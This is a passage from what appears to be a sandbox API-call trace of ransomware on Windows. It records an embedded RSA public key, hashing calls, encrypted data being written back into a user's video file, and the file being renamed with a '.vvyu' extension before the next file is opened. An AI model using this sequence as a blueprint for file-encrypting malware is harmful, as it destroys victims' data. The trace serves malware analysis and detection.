PUBLIC KEY-----\\\\n") returned 492 [0202.515] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.515] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.520] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.520] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.520] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.521] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.521] GetLastError () returned 0x0 [0202.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.521] GetLastError () returned 0x0 [0202.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.522] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.522] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.523] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.523] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.523] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9710) returned 0x2ea99b0 [0202.524] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1b58 [0202.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3620 [0202.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1ba0 [0202.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3638 [0202.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3668 [0202.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36c8 [0202.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3680 [0202.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.526] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36c8 [0202.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0202.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3680 [0202.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3668 [0202.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0202.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0202.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0202.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0202.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.533] GetCurrentThreadId () returned 0x66c [0202.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea93a8 [0202.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.534] GetCurrentThreadId () returned 0x66c [0202.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36c8 [0202.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3668 [0202.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0202.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3680 [0202.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3650 [0202.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36e0 [0202.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0202.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36b0 [0202.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3698 [0202.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36f8 [0202.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3698 [0202.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0202.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3668 [0202.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0202.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0202.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0202.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1ba0 | out: hHeap=0x620000) returned 1 [0202.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.549] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x9709, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x9709, lpOverlapped=0x0) returned 1 [0202.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.550] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x970e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.550] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.552] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.553] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.553] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.553] CloseHandle (hObject=0x510) returned 1 [0202.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0202.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.557] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\MpjP3oSTE.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\mpjp3oste.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\MpjP3oSTE.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\mpjp3oste.mkv.vvyu")) returned 1 [0202.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.559] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0202.562] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d41e80, ftCreationTime.dwHighDateTime=0x1d8a169, ftLastAccessTime.dwLowDateTime=0x1a13cd40, ftLastAccessTime.dwHighDateTime=0x1d8a72a, ftLastWriteTime.dwLowDateTime=0x1a13cd40, ftLastWriteTime.dwHighDateTime=0x1d8a72a, nFileSizeHigh=0x0, nFileSizeLow=0x129d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s_e2a5ScpFSgR9-.mkv", cAlternateFileName="S_E2A5~1.MKV")) returned 1 [0202.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0202.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.563] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\s_e2a5ScpFSgR9-.mkv") returned=".mkv" [0202.563] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\s_e2a5ScpFSgR9-.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\s_e2a5scpfsgr9-.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.564] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=76248) returned 1 [0202.564] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.567] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x129b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.567] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.569] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 